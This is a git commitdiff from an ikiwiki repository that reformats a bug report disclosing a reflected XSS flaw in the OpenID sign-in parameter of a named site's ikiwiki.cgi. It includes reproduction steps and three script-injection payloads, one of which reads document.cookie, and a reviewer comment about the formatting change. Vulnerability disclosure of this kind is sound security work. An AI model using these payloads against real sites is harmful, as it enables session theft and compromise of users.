git.vanrenterghem.biz Git - git.ikiwiki.info.git/commitdiff
fix formatting
author http://smcv.pseudorandom.co.uk/ <smcv@web>
Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
committer admin <admin@branchable.com>
Mon, 30 Mar 2015 10:56:25 +0000 (06:56 -0400)
doc/bugs/XSS_Alert...__33____33____33__.mdwn

index 436e3faaec1fed04fa5d37e04bd14419db1168d8..2c147073a018d42e3e3be4cb56ea47e6d4b92007 100644 (file)
@@ -5,14 +5,16 @@ Vulnerable Links:
 webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 
 How To Reproduce The Vulnerability :
 webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 
 How To Reproduce The Vulnerability :
+
 1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
 3. forward the request
 
 XSS Payload :
 1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
 2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
 3. forward the request
 
 XSS Payload :
-1. "></script><script>prompt(909043)</script>
-2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
-3. "></script><script>prompt(document.cookie)</script>
+
+1. `"></script><script>prompt(909043)</script>`
+2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
+3. `"></script><script>prompt(document.cookie)</script>`
 
 NOTE : Proof of concept is attached.
 
 
 NOTE : Proof of concept is attached.
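Review bot: In the "XSS Payload" list, the added backticks do more than tidy the layout, and the commit message "fix formatting" does not record that. The three removed lines put literal `</script><script>` markup straight into a Markdown page, where it is treated as raw HTML rather than as text; the code spans make the payloads render literally, which is worth stating in the message. The URLs under "Vulnerable Links" and in step 1 are left bare by this change; wrapping them in backticks as well would keep `&do=signin&openid_identifier=1` literal and match the payload lines.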